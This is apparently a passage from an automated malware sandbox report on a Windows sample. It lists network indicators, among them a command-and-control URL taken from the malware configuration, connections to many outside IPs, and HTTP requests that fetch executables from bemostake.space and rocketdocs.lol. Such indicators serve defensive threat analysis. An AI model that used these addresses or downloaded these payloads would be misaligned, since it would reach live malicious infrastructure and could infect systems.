                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 185.196.9.174 7777
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm
                        Source: unknownNetwork traffic detected: IP country count 13
                        Source: global trafficTCP traffic: 192.168.2.7:49769 -> 130.133.110.14:33445
                        Source: global trafficTCP traffic: 192.168.2.7:49770 -> 194.249.212.109:33445
                        Source: global trafficTCP traffic: 192.168.2.7:49819 -> 147.45.126.71:3752
                        Source: global trafficTCP traffic: 192.168.2.7:52242 -> 46.29.238.96:4872
                        Source: global trafficTCP traffic: 192.168.2.7:52249 -> 185.196.9.174:7777
                        Source: global trafficTCP traffic: 192.168.2.7:52252 -> 104.223.122.15:3389
                        Source: global trafficTCP traffic: 192.168.2.7:52253 -> 51.254.84.212:33445
                        Source: global trafficTCP traffic: 192.168.2.7:52255 -> 185.58.206.164:33445
                        Source: global trafficTCP traffic: 192.168.2.7:52256 -> 195.93.190.6:33445
                        Source: global trafficTCP traffic: 192.168.2.7:52258 -> 95.215.44.78:3389
                        Source: global trafficTCP traffic: 192.168.2.7:52259 -> 163.172.136.118:3389
                        Source: global trafficTCP traffic: 192.168.2.7:52261 -> 37.97.185.116:33445
                        Source: global trafficTCP traffic: 192.168.2.7:52262 -> 80.87.193.193:3389
                        Source: global trafficTCP traffic: 192.168.2.7:52263 -> 46.229.52.198:33445
                        Source: global trafficTCP traffic: 192.168.2.7:52264 -> 85.21.144.224:33445
                        Source: global trafficTCP traffic: 192.168.2.7:52265 -> 37.187.122.30:3389
                        Source: global trafficTCP traffic: 192.168.2.7:52266 -> 205.185.116.116:33445
                        Source: global trafficTCP traffic: 192.168.2.7:52267 -> 198.98.51.198:3389
                        Source: global trafficTCP traffic: 192.168.2.7:52268 -> 104.233.104.126:33445
                        Source: global trafficTCP traffic: 192.168.2.7:52272 -> 148.251.23.146:2306
                        Source: global trafficTCP traffic: 192.168.2.7:52274 -> 193.124.186.205:33445
                        Source: global trafficTCP traffic: 192.168.2.7:52138 -> 162.159.36.2:53
                        Source: global trafficHTTP traffic detected: GET /test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe HTTP/1.1Host: bemostake.spaceConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /utox_x86.exe HTTP/1.1Host: rocketdocs.lolConnection: Keep-Alive
                        Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 147.45.126.71:3752 -> 192.168.2.7:52140
                        Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 147.45.126.71:3752 -> 192.168.2.7:52206
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E947E00 recv,WSAGetLastError,3_2_00007FF79E947E00
                        Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe HTTP/1.1Host: bemostake.spaceConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /utox_x86.exe HTTP/1.1Host: rocketdocs.lolConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=45VhsCwYtemOw1F&MD=6sXZbsPr HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                        Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
